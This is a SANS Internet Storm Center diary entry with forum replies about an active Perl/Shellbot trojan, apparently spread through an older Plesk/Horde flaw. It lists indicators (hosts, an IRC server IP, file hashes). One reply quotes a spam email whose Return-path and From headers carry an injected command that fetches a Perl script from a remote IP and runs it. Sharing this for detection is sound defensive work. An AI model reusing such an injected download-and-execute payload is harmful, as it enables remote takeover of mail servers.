Threat Level: green Handler on Duty: Russ McRee

SANS ISC: Active Perl/Shellbot Trojan - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Active Perl/Shellbot Trojan

ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at 89.248.172.144. What we have so far, it appears it is exploiting older version of Plesk.

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Guy

427 Posts
ISC Handler
I received an interesting attempt to infect my mailserver with the Shellbot Trojan. The command to download and execute the trojan is sent as subject line and as reply to.

I have no idea, how that command shall be executed, at least my postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail, because it was identified as spam and redirected), the intended target is not the mail client.

Find attached the mail including headers (two header lines with only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
by mail.######.de (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
MISSING_DATE=1.36, MISSING_HEADERS=1.021, MISSING_MID=0.497,
MISSING_SUBJECT=1.799, RDNS_NONE=0.793, TO_NO_BRKTS_NORDNS=0.001]
autolearn=no
Received: from mail.######.de ([127.0.0.1])
by localhost (mail.######.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [1.234.45.84])
by mail.######.de (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.6E6AB482E1@mail.######.de>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com

x
Anonymous
The way that this is happening is through the plesk vulnerability in the about article. It may affect more than just plesk related systems but all systems using horde. They can execute it via the login screen. Take a look at this http://kb.parallels.com/en/113374. I've dealt a lot with these, if you need more assistance with this particular issue, you can always email me directly at kestrel@trylinux.us, or zwikholm@cari.net
Zach W

10 Posts

Sign Up for Free or Log In to start participating in the conversation!